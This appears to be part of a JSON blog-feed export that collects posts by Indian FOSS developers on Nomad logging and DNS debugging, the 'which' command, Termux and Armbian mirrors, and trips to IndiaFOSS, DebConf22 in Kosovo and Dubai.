If you’re interested in a complete setup on deploying this to Nomad, take a look at the dev setup, which contains a Nomad jobspec to deploy nomad-vector-logger as a sidecar with vector as the main task.\nHope this post helped you start configuring a logging pipeline for applications running with non-docker task drivers.\nFin!",[],{"slug":1496,"title":1497,"link":1498,"pubDate":1499,"contentSnippet":1500,"tags":1501,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"triangle-of-fulfilment","The triangle of fulfilment","https:\u002F\u002Fnadh.in\u002Fblog\u002Ftriangle-of-fulfilment\u002F","Mon, 22 Aug 2022 00:00:00 +0000","“It’s 2022. Why hasn’t someone done it already!?”, I find myself exclaiming frequently when stumbling upon things and ideas that are relatively simple and so obvious that they should exist, but for some reason, don’t. It is frequently about software, occasionally about physical things, and once in a while, about an organisation that focuses on a certain cause that really ought to exist. It is of course not about hard problems like cold fusion or disease and poverty eradication, but things like … a mailing list manager.",[],{"slug":1503,"title":1504,"link":1505,"pubDate":1506,"contentSnippet":1507,"tags":1508,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"termux-armbian","New Termux and Armbian mirrors live now!","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Ftermux-armbian\u002F","Tue, 16 Aug 2022 07:19:31 +0000","Termux mirror.albony.xyz\u002Ftermux It’s added to the termux mirrorlist, so you should get it automatically soon. If you want to add it manually:\ntermux-change-repo (part of the termux-tools package) can be used to modify sources. Another way of doing it is by using apt edit-sources and adding the following lines:\n# main deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-main stable main # root deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-root root stable # X11 deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-x11 x11 main Armbian mirror.albony.xyz\u002Farmbian This is also added to the armbian mirrorlist, but you can also add it manually by editing the sources.",[],{"slug":1510,"title":1511,"link":1512,"pubDate":1513,"contentSnippet":1514,"tags":1515,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"stop-which","Don't use which","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstop-which\u002F","2022-08-07T18:30:00.000Z","which is a non-standard\u002Fnon-POSIX-compliant program. I faced many issues getting which to work in a chroot environment (Nomad).\nSo basically, which is a simple shell-script program that finds an executable by searching the $PATH (which is what makes it less deterministic). It’s also somehow symlinked two levels deep in Debian:\n$ ls -laht \u002Fusr\u002Fbin\u002Fwhich\nlrwxrwxrwx 1 root root 23 Apr 26 22:25 \u002Fusr\u002Fbin\u002Fwhich -> \u002Fetc\u002Falternatives\u002Fwhich\n$ ls -laht \u002Fetc\u002Falternatives\u002Fwhich\nlrwxrwxrwx 1 root root 26 Apr 26 22:25 \u002Fetc\u002Falternatives\u002Fwhich -> \u002Fusr\u002Fbin\u002Fwhich.debianutils\nNow, notice this:\n$ which ls\nls: aliased to ls --color=tty\n\n$ \u002Fusr\u002Fbin\u002Fwhich.debianutils ls\n\u002Fusr\u002Fbin\u002Fls\nBoth are supposedly the same program, so why is the output different? This is because which is a shell built-in in zsh:\n# zsh\nwhich which\nwhich: shell built-in command\n\n# bash\nwhich which\n\u002Fusr\u002Fbin\u002Fwhich\nThe inconsistency happens because zsh’s built-in which knows about aliases, while the external which.debianutils only searches $PATH.\nThis article has some more details on why which is bad and how the Debian team is slowly deprecating it from debianutils.\nWhen I invoked which from inside a Nomad chroot, it complained that I didn’t have \u002Fbin\u002Fsh (because I was using a custom chroot mount). I started looking hard for alternatives because this silly utility had already wasted too much of my time.\nWhat to use#\nUse command -v. It’s a shell built-in, so it avoids a dependency on an external binary (unlike which).\nUsage example:#\nif ! command -v aws > \u002Fdev\u002Fnull; then\n        echo \"Can't find 'aws' executable. Aborted.\"\n        exit 1\nfi
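The same PATH lookup exists natively in other languages too. As a minimal sketch (my addition, not from the post), a Go program can use the standard library's exec.LookPath instead of shelling out to which:

package main

import (
	"fmt"
	"os"
	"os/exec"
)

func main() {
	// exec.LookPath searches $PATH just like `command -v`, with no
	// dependency on an external which binary.
	path, err := exec.LookPath("aws")
	if err != nil {
		fmt.Fprintln(os.Stderr, "Can't find 'aws' executable. Aborted.")
		os.Exit(1)
	}
	fmt.Println(path)
}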
References#\nI found the following posts while digging into which and its alternatives:\nwhich-not-posix\nwhy-not-use-which-what-to-use-then\nFin",[],{"slug":1517,"title":1518,"link":1519,"pubDate":1520,"contentSnippet":1521,"tags":1522,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"indiafoss-2022","Attending IndiaFOSS 2022","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Findiafoss-2022\u002F","2022-08-06T18:30:00.000Z","On June 28, I received a text from Anand nudging me to submit a CFP for IndiaFOSS. Until then, I’d not planned to attend IndiaFOSS because travelling to participate in a conference didn’t seem enticing. However, the thought of visiting Bangalore (a city where I spent five years before Covid took the joy from our lives) stayed in my mind for the rest of the day. Call it serendipity or just that little external motivation from Anand; I decided to submit a proposal on Self Hosting with Nomad. IndiaFOSS would be the first physical conference I attended after the pandemic. I love attending conferences because you get to meet and interact with many people (I somehow dislike the term “networking with people” because it’s heavily connoted with marketing\u002Fsales pitches).\nIndiaFOSS is a v2 of IndiaOS, a small pilot conference that happened in 2020. Around 650 people attended IndiaFOSS, and the execution scale was much bigger this time. IndiaFOSS is a 100% volunteer-driven conference, yet everything was quite professionally managed. My friend Dhiraj travelled from Chennai to attend the conference, and I hung out with him for most of the next two days.\nFilling our tummies with a scrumptious breakfast of Thatte Idlis, we headed to attend the keynote by Rushabh, who gave an excellent overview of FOSS United and its journey so far. There was a series of exciting talks right after - especially by Kovid, a prolific FOSS contributor from India. Kovid’s software is widely used across the globe. He shared the story of how calibre evolved from a bunch of scripts written to get around Sony’s DRM to become the most sought-after ebook management tool that it is now. I’ve myself used calibre in one of my initial projects (back when I was still learning Python, please don’t judge that codebase). Next was the much-awaited interview of Rudra Saraswat - the 12-year-old whiz kid who’s a primary contributor to Ubuntu Unity Remix and many other projects.
The entire auditorium was stunned to witness how this bright young kid manages his studies, extra-curriculars and FOSS projects with laser-sharp focus.\nI spent some time reviewing my slides; my talk was scheduled right after an excellent talk by Nabarun on how the Kubernetes release team works. I was pleasantly surprised to see many people interested in Self Hosting\u002FNomad. You can check out the slides here.\nIt was time for lunch, and I finally got to meet Vinayak, Bibhas, Gaurav and Raghav, with whom I’ve been interacting in a small Discord group for so many months! This is what the pandemic years took away from us, sigh!\nAfter lunch, Kailash presented his fantastic talk on languages, dictionaries, and his FOSS project - dictpress. Kailash was anticipating that people would be drowsy after lunch, but I doubt anyone would want to miss this talk. He gave a glimpse of the monumental work done by Datuk KJ Joseph and V. Krishna in the field of dictionaries and how dictpress makes it easier for anyone to host a dictionary website for any language.\nThe rest of the day was spent hanging out in the lobby, meeting fellow hackers, and chit-chatting. I consider myself an introvert, but I guess with developers, I tend to speak up openly because we tend to skip the small talk :P. Rainy evenings and a weekend meant all the Peak Bengaluru memes about not finding cabs were experienced first-hand.\nDay 2 had quite a good lineup of talks as well. Krutika shared the designer’s dilemma of contributing to FOSS projects. Nemo talked about how we could get a FOSS UPI app and touched upon the openness of UPI. We even did an open space around Self Hosting where many of us self-hosting enthusiasts came together and discussed different topics\u002Fproblems we encountered while self-hosting. It was my first time interacting with Abhas, who runs Deeproot Linux. He shared his wisdom and experiences from self-hosting email servers, media servers and just about anything. I was pretty motivated by his dedication.\nThe best part about IndiaFOSS was that this wasn’t a conference meant just for techies. The talks highlighted every domain of FOSS - policy, design, languages, and hardware - rather than just keeping it limited to software. I was happy to see a conference not peddling any “corporate” product talks. This is what all FOSS conferences should look like, I guess?\nI look forward to attending (and hopefully volunteering at) next year’s conference!\n\nFin",[],{"slug":1524,"title":1525,"link":1526,"pubDate":1527,"contentSnippet":1528,"tags":1529,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"reflections-on-indiafoss-2022","Reflections on IndiaFOSS 2.0","https:\u002F\u002Fnadh.in\u002Fblog\u002Freflections-on-indiafoss-2022\u002F","Mon, 01 Aug 2022 00:00:00 +0000","IndiaFOSS 2.0[1], the second edition of the conference organised by the FOSS United Foundation, of which I am a part, was held in Bengaluru on the 23rd and 24th of July. Previously named IndiaOS, the first edition that ran in January 2020 was an experiment that turned out to be a small, nice gathering of ~100 people in a small hall in a corner of JP Nagar, a residential area in South Bengaluru. There were talks, discussions, and food. It was nice.
The conference was meant to be a yearly affair, which the COVID fiasco stalled, like a billion other human affairs.",[],{"slug":1531,"title":1532,"link":1533,"pubDate":1534,"contentSnippet":1535,"tags":1536,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"layover-in-dubai","A budget layover in Dubai","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Flayover-in-dubai\u002F","Sun, 31 Jul 2022 13:19:11 +0530","A few days ago, I had a layover in Dubai while returning from a fun DebConf in Kosovo. The layover was a bit longer than 24 hours. I was joined by my friend Abraham Raji, who had to go to Kochi and had a layover of around 22 hours.\nSince my layover was longer than 24 hours, I needed a transit visa to board my Dubai to Delhi flight. For layovers less than 24 hours, a transit visa is not required for boarding the next flight. Note that you just need to fill a form online to obtain a transit visa for the UAE. Since my travel agent booked the flights, they took care of the transit visa on my behalf for a fee of 2,000 INR.\nMy flight from Tirana landed at Terminal 2 of the Dubai airport at around 21:30 local time. Since I had a transit visa, my plan was to roam around in Dubai and return to the airport to catch my connecting flight. Therefore, I went through immigration. The officer had a look at my visa and stamped the UAE entry stamp on my passport. Then I went through customs and came out at the Arrivals section of the airport, where I took a seat. It was around 22:00 hours local time.\nThe airline handed over my checked-in luggage - a heavy trolley bag - at the Dubai airport even though my connecting flight was with the same airline, FlyDubai. Perhaps it was because my layover was more than 24 hours long. The airline staff at Tirana only issued my boarding pass till Dubai. However, Abraham got his boarding passes till Kochi, and he would get his luggage directly in Kochi.\nI asked around but couldn’t find any cloakrooms to store my luggage. Soon Abraham joined me, and I got to know he also had plans to roam around the city.\nAt the airport, Abraham met a person he talked to in Malayalam. That person recommended that we withdraw at least 200 dirhams or AED (around 4,000 INR) in cash from an ATM in order to roam around the city. Therefore, I withdrew 200 AED in cash.\n\n      \nDirham notes of denominations 10, 20, 50, 100.\nWe planned to spend the night at the airport and roam around the city in the morning. We didn’t book a hotel and instead planned to sleep on the benches in the arrivals. I was hungry, as I didn’t have lunch on my Tirana to Dubai flight due to the lack of lacto-ovo vegetarian options. Therefore, I bought a banana for 6 AED (equivalent to 120 rupees) from the Costa Coffee shop located next to where we were sitting.\nUnable to sleep, we came out of the airport in search of a place to eat. It was midnight and all the shops were closed. Someone suggested we check whether the McDonald’s inside the departures section was open. I was not sure whether we could just go inside departures, as this is not allowed at Indian airports unless you are catching a flight.\nWe met a lot of Indians and asked them where we could go for dinner. One of them claimed that a restaurant near the Al-Qiyada metro station should be open. We walked 2 kilometers to reach that metro station. However, the restaurant wasn’t open, and so we had to return disappointed.
Abraham and I had some interesting conversations on the way to pass the time. I was starving at this point.\nWhile returning to the Arrivals, we saw a restaurant open on the way. The name of the restaurant was ‘Food Castle Express’. It was located within 1 km of the Arrivals.\n\n      \nA photo of the Food Castle Express restaurant where we had a filling meal.\nThe restaurant had Indian food at reasonable prices. It was run by people from Kerala and seemed to be a popular place among the airport staff. To give you an idea of prices, a plate of 3 Idlis was 5.5 AED (equivalent to 110 Indian Rupees), a cup of tea was 1 AED (20 Indian Rupees), a plate of Pav Bhaji was 8 AED (around 160 Indian Rupees), while Chicken Samosa, Aloo Samosa and Cheese Samosa were 1.5 AED per piece, and Chicken Fried Rice was 12 AED.\nI took the following:\nItem | Price (AED) | Price (INR)\nIdli (3 pcs) | 5.5 | 110\n1 Tea | 1 | 20\nChhole Bhature | 7.5 | 150\nTotal | 14 | 280\n\nWe had this meal around 04:30 hours, and it kept me satiated for literally the whole day. Even though I was not in India, I was delighted to have Indian food. We were having it after a long time, coming from a 3-week stay in Europe where every dish was bland.\n\n      \nA chhole bhature plate from the Food Castle Express restaurant\nAfter having our meal, we went back to the Arrivals section to catch some sleep. Abraham took a nap on the benches, while I failed to get any. In the meanwhile, I found out that the water inside the washroom was too hot to even wash my face with.\nDubai Airport had very good Wi-Fi, which was a lifesaver. I didn’t have a local SIM card, so this helped me a lot in contacting home and passing time. The Wi-Fi is free and unlimited. You simply select the “DXB Free Wifi” option, and it connects without asking for a phone number or OTP.\nAbraham slept for a couple of hours on the benches and woke up by 09:00. At this time, we exited the airport and looked for a bus to drop us at some metro station. We found out that we needed a card to use public transport (such as buses, trams and the metro) in Dubai. This card is called the Nol card. In order to obtain one, we had to go to a metro station. There must be other ways to obtain the card, but we didn’t know any.\nThe nearest metro station was Abu Hail Metro station - a 2 km walk from the airport. It was not exactly fun, as Dubai has a hot desert climate and the temperature was around 40°C, with sand coming into our eyes. To add to this, we had a lot of luggage. The bus stops were air-conditioned and sheltered, so we took shelter in one of them while walking towards the metro station.\n\n      \nA bus stop in Dubai.\nAt the Abu Hail metro station, we took the silver Nol card (one each), which was 25 AED (500 INR) with a 19 AED balance. We planned to go to Burj Khalifa from here.\nThe metro from Abu Hail to Burj Khalifa was 5 AED. It was much cheaper than taking a taxi, which would have added 25 AED as the basic fare. We reached the Burj Khalifa metro station in 25 minutes, followed by a walk to the tower itself. While clicking pictures, we realized that fitting the whole Burj Khalifa in a single frame is difficult. After all, it is the tallest building in the world!\n\n      \nMe and Abraham with Burj Khalifa in the background\nAfter roaming around a bit, we went to the Dubai Mall, which was walking distance from the Burj Khalifa.
The strategy was to spend as much time as possible inside such buildings to avoid the onslaught of the harsh weather. Abraham had a meal in the mall, while I didn’t eat anything due to the lack of vegetarian options.\n\n      \nDubai Mall\nWe still had 14 AED left on our Nol card at this point. Further, there is no facility to return the card and get the balance refunded. Therefore, we wanted to spend that amount before leaving the city. So, we planned a tram ride, which would spend almost all the card balance, cover the city, and not require walking outside air-conditioning. To take the tram, we went to Sobha Realty Metro Station and walked towards the tram station.\nThe tram ride was nice. If you ride the Dubai tram, be careful to check in and check out using the Nol card at the tram station, otherwise you could be fined. We saw Dubai’s Marina area from the tram. The tram costs 3 AED regardless of the station you check out from. We deboarded at the same station where we took the tram.\nFrom there, we took a metro from DMCC station and returned to Abu Hail metro station. We went to Food Castle Express. I didn’t find a good vegetarian option there, so I skipped eating and just took a chai.\n\n      \nView from inside the tram\nAfter this, we returned to the airport to catch our respective flights. We didn’t face any language problems in Dubai. English was widely spoken. Most of my conversations were in Hindi, as I met many Indians and Pakistanis who knew Hindi. In fact, Abraham was talking to people in Malayalam (which is more popular in Dubai than Hindi). Overall, people were very nice, which made us feel at home.\nWe had a nice time in Dubai, even though it was tiring due to lack of sleep and the harsh weather.",[],{"slug":1538,"title":1539,"link":1540,"pubDate":1541,"contentSnippet":1542,"tags":1543,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"my-experience-attending-debconf22","My Experience of attending DebConf22 in Kosovo","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmy-experience-attending-debconf22\u002F","Mon, 25 Jul 2022 22:22:10 +0200","I just came out of what has been one of the most wonderful experiences of my life– DebConf in Kosovo. DebConf is the annual conference of Debian contributors from all around the world. This was my first time attending a DebConf, which presented a great opportunity for me to explore different cultures and food, along with making many new friends in the Debian community, as it featured 210 attendees from 38 countries.\n\n      \nDebConf22 logo\nI registered and applied for a bursary, which was accepted by the DebConf bursary team. I applied for the Kosovo visa and, after a long, frustrating process of getting it, reached the venue of DebConf on 10th July 2022, about which I have already written in detail. Getting the Kosovo visa was already a great feat before DebConf, and I am highly grateful to the organizers for putting in sincere efforts. Without this, it would not have been possible for us Indians to attend the event.\nThe Venue\nThe DebConf venue was the Innovation and Training Park in Prizren, Kosovo. As soon as we reached the ITP campus, our eyes were treated to beautiful views of mountains and blue sky in all directions. The natural beauty of the place was stunning. You take a random photo of this place and it will come off as beautiful. This is how good it was.
The fact that the campus was a German military base till December 2019 spiced up many people’s interest in the history of the place, and there were some discussions regarding this.\nThe city of Prizren has a bridge over the Lumbardhi river, which also features in the DebConf 22 logo. The bridge is a must-visit place in Prizren, in my opinion. There was also a castle, which had views of the beautiful city of Prizren, but I missed visiting it.\nThe DebCamp was held from 10 July to 16 July 2022, and the DebConf happened from 17th-24th July 2022. Most of the people came at the time of DebConf, and the DebCamp days did not have so many attendees. By the time DebConf started, I had already adjusted to the campus.\nFood\nBeing a non-meat eater, the first thing I was worried about before arriving at the venue was food, as I had read on the internet that Kosovo’s food is heavily based on meat. For my first lunch, I had only veg pasta (multiple plates), as most of the items in that lunch were meat-based. Over the next two-three days, the availability of vegetarian food got better and I started enjoying the food. They started serving bean soup, vegetable soup, lentils and rice at lunch time, expanding their vegetarian dishes. I enjoyed the food and it was way better than what I expected. The coconut and chocolate pastry served at dinner time were delicious, and there was another delicious dessert called Al-Baklava. Watermelon, apples, muskmelon and peach were frequently served fruits. The food got repetitive after a point, though, and it wasn’t as enjoyable, but I think it was still good, as I am not sure if there is a lot of variety to expect from Kosovo in the vegetarian section.\nDrinking water was available through plastic bottles in the restaurant. In my opinion, this wastes a lot of plastic and is not an environment-friendly option. The locals were saying that the tap water is drinkable, but it would still have made sense to have a water filter in the dorms, or water coolers, etc.\nDebConf\nWhen the DebConf started on 17th July, new attendees started arriving in bigger numbers. Here I made many friends, in the hacklab or when sitting over lunch. As far as I remember, the most discussed topic was politics. People were very enthusiastic about telling their country’s history and politics and asking me about Indian culture, food etc.\nThe people were very, very nice, and I had a great time with the Debian community. They were from very diverse backgrounds, each one having their unique story of their involvement with Debian. On the other hand, there were people new to Debian who asked my viewpoints on it, which gave me opportunities to propagate the Free Software philosophy.\nThe participants ranged from Google or Canonical employees to college students and high school students. I met a lot of students from Pristina, the capital of Kosovo, for whom the DebConf must have been a good opportunity. Since Debian is for everyone, there were many people from the non-technical side of Debian. I liked the fact that the attendees included people who didn’t know English, which gave more diversity.\nI attended the talks whenever the topics seemed interesting to me. Since there were three tracks of talks happening simultaneously, I missed some of them. The dining hall, hacklab and the accommodation were a bit far from each other. Further, it was a mountainous area, and it was not an easy breeze for me to get around the campus quickly.\nThere was a noisy hacklab and a silent hacklab.
I used to hang out at the noisy hacklab, as that gave me a chance to meet new people. The noisy hacklab had free-of-charge coffee, while beer and water were given on a paid basis. Attendees could volunteer to be a bartender, brewing and serving beer and coffee in the hacklab. The card games I played in the hacklab were very fun. Karl from the video team told me a long story about how much travelling the video team has to do with the equipment and how hectic it is. I was totally ignorant about this aspect of DebConf before Karl told me this.\nI didn’t spend a lot of time in my accommodation. I used to go there mainly to sleep and shower. The walls were thin, so there was an actual email sent to some debconf mailing list asking people not to talk loudly in the dorms. The rooms were spacious and had good air-conditioning. By the time DebConf started, the dorms had a very good Wi-Fi connection.\nI volunteered for some tasks for the video team. I was a talkmeister for one talk - the person who introduces the speaker and hands the mic to people in the audience who want to ask the speaker questions - and a camera operator in two of the talks.\nCheese and Wine Party\nThe Cheese and Wine Party is a tradition of DebConf in which people bring food from their local areas to share with others. I brought Dal Samosa, which is a snack from my local place in India. This was, in general, liked by people at the party. I tried the French alcoholic drink Pastis, which tasted like fennel, and found it good. The Cheese and Wine Party happened after dinner, so I didn’t eat a lot. I had great conversations at the party with many people and it was fun.\nDal Samosa at a shop in India.\nCredits: Ravi Dwivedi, CC BY-SA 4.0\n\n\nDayTrip\nThe DayTrip was organized by the DebConf for attendees to take time out of their schedule and visit some places in Kosovo. You can see all the options of DayTrips here.\nI went on tour A: Bus tour of Eastern Kosovo. It covered Gadime Cave, Ulpiana Ancient City, Gracanica Monastery, the Bear Sanctuary, and Artana (Novoberda) Fortress. My feeling was that the day trip was trying to cover a lot of places, so it became rushed. The places were beautiful and worth visiting in Kosovo. The tour featured an unexpected hike in the Bear Sanctuary. The weather was sunny and very hot, so overall it was a tiring trip with beautiful places and good pictures.\nThe tour guide was excellent. He was informative and also took care of the people falling behind on the trip. We were joined by other guides, one at the Marble Cave and the other at Gracanica Monastery. The guide at the Marble Cave was telling us about it in the Albanian language, which our tour guide was translating into English. The guides were very enthusiastic about the places they were telling us about. It was like an overdose of knowledge that day. We fell a little behind schedule, and so we couldn’t really explore the Gracanica Monastery; we had to rush back to our destination after a few minutes.\nSome photos from the DayTrip taken by me:\nGracanica Lake\n\n\n\nGracanica Monastery\n\n\n\nBeautiful views seen from the Bear Sanctuary\n\nConference Dinner\nThe Conference Dinner was held outside of the DebConf venue, in the Alegria Hotel. Here the food was a disappointment for non-meat eaters\u002Fvegans, as the restaurant only served rice and some snacks. At the conference dinner, I liked the Flija. I had some good company at the conference dinner, so it was still fun.\nKeysigning\nIn Debian, people sign each other’s keys in order to build a web of trust. It usually involves an ID check.
People will usually ask you for your passport to verify that it is really you. I saw many countries’ passports when keysigning, which was fun. After the ID check and verifying your key fingerprint, they sign your keys. Tobi helped me configure caff so that I could easily sign keys, rather than doing it manually.\nGoodbye Kosovo\nAll in all, it was a great trip to Kosovo and a very unique one. I am already out of Kosovo as of writing this. I would like to visit Kosovo again in my life. It was so good. Thanks a lot to all the organizers, sponsors and people who made my time fun at DebConf 22 in Kosovo.\nAttending a DebConf is a learning opportunity on many fronts, be it the diversity among the people, cultures, food and opinions, or the software side of Debian. Writing about my experience has been a challenge in itself. Hopefully, I was able to pin down my experience, as there was a lot to share.\nLooking forward to seeing you all at the next edition of DebConf, which will take place in my country, India.\nUpdate on 06-August-2022: I got the reimbursement of all my travel expenses related to DebConf22 within just 4 days of filling out the reimbursement form. So quick!",[],{"slug":1545,"title":1546,"link":1547,"pubDate":1548,"contentSnippet":1549,"tags":1550,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"trip-to-prizren-bridge","Trip to Prizren Bridge","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftrip-to-prizren-bridge\u002F","Sat, 16 Jul 2022 00:00:00 +0000","Yesterday I went to the Prizren stone bridge, which is in Prizren, Kosovo. Prizren is often referred to as the cultural capital of Kosovo.\nI am staying at the venue of DebConf 22, from where it is within walking distance, around 1.5 km.\nPrizren Stone bridge.\n\nI went with my friends who were also attending DebConf 22. We reached the bridge at around 20:30 hours (Kosovo follows Central European Time). It is in the city center and the views were very beautiful. The Lumbardhi river flows below the bridge, with beautiful mountains surrounding it on all sides.\n\n      \nSinan Pasha Mosque\nThe bridge also gives a nice view of the Sinan Pasha Mosque, which is a very important monument of the Prizren city, built in the Ottoman architectural style.\nNear the bridge, a person was roasting corn, which cost €1 per piece. The corn was soft, but did not have many kernels.\nA street-side vendor roasting corn near the Prizren bridge.\n\nFound this beautiful take-home souvenir in the shape of the Prizren stone bridge.\nSouvenir from Prizren Bridge.",[],{"slug":1552,"title":1553,"link":1554,"pubDate":1555,"contentSnippet":1556,"tags":1557,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"dns-nomad","Debugging DNS Issues in Nomad","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdns-nomad\u002F","2022-07-13T18:30:00.000Z","At work, my colleagues and I stumbled upon a hair-pulling networking issue when connecting to a Kafka cluster. We use the franz-go library in our Golang applications to interact with an external Kafka cluster. These Go apps are hosted inside a Nomad cluster and run with the exec driver.\nThe Issue#\nIssues where a specific condition happens only sometimes are terribly difficult to debug because you need to reproduce the bug in a controlled environment. Our issue was that writing the first message to a Kafka topic took unusually long (>5 seconds) while the writes of subsequent messages were instant.
The following messages were instant for the next 30s, and then a write again took >5s.\nThe request flow looks something like this:\nGo app in Nomad cluster (bridge mode) -> Kafka node in a Kafka cluster\nBoth apps are inside the same VPC, running on AWS EC2 instances. The Nomad task runs with network.mode=bridge, which means that there are some iptables rules configured to do SNAT\u002FDNAT translation to forward packets from the default bridge network (nomad) to the default ethernet interface (ens5).\nWe have a couple of other Nomad clusters in our environment that regularly communicate with external EC2 instances, and we’ve never observed any slowdowns in our existing applications. This behaviour seemed specific to Kafka. However, we discovered that we could not reproduce the high wait time issue in Kafka when the message was sent from a task running in host mode. So now we had two conflicting observations which made this issue strange:\nThe issue happens in bridge mode, not in host mode.\nThe issue happens only with Kafka nodes, not with any other external services - even in bridge mode.\nWe spent a lot of time dissecting our apps, turning on TRACE level logging for Kafka clusters and enabling debug mode in franz-go. One of the significant challenges for us was that even an idle Kafka cluster can be super chatty, producing ~1Mn records in a few minutes when run with TRACE. Cutting through the noise and finding the exact point where the slowdown happened turned out to be more difficult than expected.\nHowever, with the debug logs in franz-go, we arrived at a breakthrough which helped us narrow down the issue. We saw a write_wait time of ~5s in the logs emitted by franz-go. The subsequent messages had a write_wait as low as a few microseconds. What was puzzling was why the client waited so long before writing the bytes to the underlying socket.\nWe forked the franz-go library and added a bunch of our custom logs to figure out where and why exactly the slowdown happens. One issue with the logs emitted by franz-go was that no timestamps were attached to the logger. We added that and deployed binaries with the patched version. This time we immediately found the logs, which showed that ~5s elapsed between the time it initiated the connection to the Kafka broker node and the time it was able to connect.\nThe Fix#\nThe node’s address was an internal hostname kafka-abc.private-zone.internal. We postulated that it could be a DNS resolver issue. We did a dig kafka-abc.private-zone.internal and instantly got the record. Maybe it’s cached? We decided to inspect \u002Fetc\u002Fresolv.conf while we waited for the TTL of the record to expire. Opening this seemingly innocent \u002Fetc\u002Fresolv.conf revealed that the issue was indeed DNS:\nnameserver bad\nnameserver good\nWe had an unreachable nameserver address in the nameserver list. The first message had a ~5s write wait because \u002Fetc\u002Fresolv.conf has a 5s default timeout in case a nameserver is unreachable. Go’s DNS resolver then picked up the second resolver, and the DNS record was cached until its TTL (30 seconds) expired. Subsequent Kafka writes on the topic worked without any issues within the TTL window. When the DNS record expired, rinse and repeat. We later found that the source of the bad nameserver was our Nomad client initialising script.
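This failure mode is easy to demonstrate. Here is a minimal sketch (my addition, not from the post) that times successive lookups with Go's resolver; with an unreachable first nameserver in /etc/resolv.conf you'd expect each uncached lookup to stall for ~5s. The hostname is the one from the post:

package main

import (
	"context"
	"fmt"
	"net"
	"time"
)

func main() {
	// PreferGo forces Go's built-in resolver, which reads /etc/resolv.conf
	// and honours its per-nameserver timeout (5s by default).
	r := &net.Resolver{PreferGo: true}
	host := "kafka-abc.private-zone.internal" // hostname from the post

	for i := 1; i <= 3; i++ {
		start := time.Now()
		addrs, err := r.LookupHost(context.Background(), host)
		// With a bad first nameserver, the lookup stalls ~5s before the
		// second (working) nameserver answers.
		fmt.Printf("lookup %d: addrs=%v err=%v took=%s\n", i, addrs, err, time.Since(start))
		time.Sleep(time.Second)
	}
}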
Takeaways#\nWe use a custom Nomad client initialising script in our Nomad clusters to populate the chroot_env. Since, by default, the chroot provided by Nomad copies the \u002Fusr\u002F directory, we found that it increased the initial startup time of the alloc. It made sense to customise the chroot_env with the list of binaries and config files we would need.\nOne of the configs happens to be \u002Fetc\u002Fresolv.conf, which DNS resolvers use to resolve queries. On the host, we have systemd-resolved running, and \u002Fetc\u002Fresolv.conf is configured with the stub resolver address. However, since that address (127.0.0.53) is unreachable from the bridge network in Nomad, we mount our custom config, which looks like:\nnameserver 10.100.0.2\noptions edns0 trust-ad\nsearch ap-south-1.compute.internal\nThe nameserver represents the AWS R53 resolver running in all VPCs if configured with enableDnsSupport in the VPC settings.\nThe above config ensures that all DNS queries for the tasks inside the bridge network go directly to the AWS R53 resolver. The resolver can do DNS lookups for the private zones associated with R53 in that VPC and forward all other hostnames to its own upstream DNS resolver.\nFun Fact#\nIf you don’t mount a custom \u002Fetc\u002Fresolv.conf, then DNS resolution is broken by default in any Nomad exec task. You can quickly reproduce it with this task definition:\njob \"sleep\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n  group \"sleep\" {\n    count = 1\n    task \"sleep\" {\n      driver = \"exec\"\n      config {\n        command = \"bash\"\n        args    = [\"-c\", \"sleep infinity\"]\n      }\n    }\n  }\n}\nRun a Nomad agent in -dev mode:\nnomad agent -dev\nnomad run sleep.nomad\nWhen you exec inside the alloc:\n$ nomad alloc exec -i -t -task sleep 8b4a0a82 \u002Fbin\u002Fsh\n$ cat \u002Fetc\u002Fresolv.conf\nnameserver 127.0.0.1\n$ dig mrkaran.dev\n;; communications error to 127.0.0.1#53: connection refused\nI believe Nomad should bootstrap some DNS resolver or a relevant iptables rule for exec tasks so that DNS can be resolved by default without the need to mount a custom config. For comparison, Docker bootstraps the container with a customisable \u002Fetc\u002Fresolv.conf, and the settings can be specified either at runtime or fall back to the global settings in \u002Fetc\u002Fdocker\u002Fdaemon.json.\nI hope this post helps someone solve these weird DNS issues when running tasks with the bridge network and exec task driver in a Nomad cluster.\nLike they say:\n\nFin!",[],{"slug":1559,"title":1560,"link":1561,"pubDate":1562,"contentSnippet":1563,"tags":1564,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"pre-debconf-22","Complicated Kosovo Visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fpre-debconf-22\u002F","Wed, 13 Jul 2022 18:04:50 +0200","DebConf is the annual conference of the Debian community. This year’s DebConf was held in Kosovo, a European country in the Balkans.\n\n      \nDebConf22 logo\nDebian sponsored me for the conference. Indian attendees needed a visa to enter Kosovo, which got complicated due to Kosovo not having any embassies in India (India doesn’t recognize Kosovo as an independent country). The organizing team came up with a solution - to send the required documents by email to the Kosovo embassy in Tirana, Albania (a neighboring country of Kosovo) and collect the visas later by visiting the embassy in person. This was possible because Albania was granting visa-free entry to Indians during that time period.
